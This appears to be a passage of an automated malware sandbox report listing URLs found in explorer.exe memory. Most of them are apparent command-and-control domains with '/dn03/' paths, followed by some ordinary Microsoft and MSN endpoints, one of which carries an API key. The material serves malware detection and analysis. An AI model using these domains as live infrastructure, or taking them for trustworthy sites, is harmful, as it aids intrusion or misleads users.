            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.imdcaam.comReferer:
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ioco.in
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ioco.in/dn03/
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ioco.in/dn03/www.numericalsemantics.com
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ioco.inReferer:
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jasonnutter.golf
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jasonnutter.golf/dn03/
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jasonnutter.golf/dn03/www.verxop.xyz
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jasonnutter.golfReferer:
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lovedacademy.com
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lovedacademy.com/dn03/
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lovedacademy.com/dn03/www.vivaness.club
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lovedacademy.comReferer:
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mcapitalparticipacoes.com
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mcapitalparticipacoes.com/dn03/
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mcapitalparticipacoes.com/dn03/www.top-dao.com
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mcapitalparticipacoes.comReferer:
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.numericalsemantics.com
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.numericalsemantics.com/dn03/
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.numericalsemantics.com/dn03/www.bx2zyg.com
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.numericalsemantics.comReferer:
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.servicepmgtl.world
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.servicepmgtl.world/dn03/
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.servicepmgtl.world/dn03/www.sukhiclothing.com
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.servicepmgtl.worldReferer:
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sukhiclothing.com
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sukhiclothing.com/dn03/
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sukhiclothing.com/dn03/www.banditsolana.com
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sukhiclothing.comReferer:
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.top-dao.com
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.top-dao.com/dn03/
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.top-dao.com/dn03/www.jasonnutter.golf
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.top-dao.comReferer:
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.verxop.xyz
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.verxop.xyz/dn03/
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.verxop.xyz/dn03/www.cataclysmicgamingapparel.com
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.verxop.xyzReferer:
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vivaness.club
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vivaness.club/dn03/
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vivaness.club/dn03/www.w937xb.com
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vivaness.clubReferer:
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.w937xb.com
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.w937xb.com/dn03/
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.w937xb.com/dn03/www.servicepmgtl.world
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.w937xb.comReferer:
            Source: explorer.exe, 00000014.00000003.2299538498.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1351724632.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BD22000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(
            Source: explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
            Source: explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSJM
            Source: explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSZM
            Source: explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSp
            Source: explorer.exe, 00000014.00000000.1348137626.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008796000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/rT
            Source: explorer.exe, 00000014.00000000.1348137626.000000000862F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc
            Source: explorer.exe, 00000014.00000000.1348137626.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?z$
            Source: explorer.exe, 00000014.00000000.1348137626.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008796000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/~T
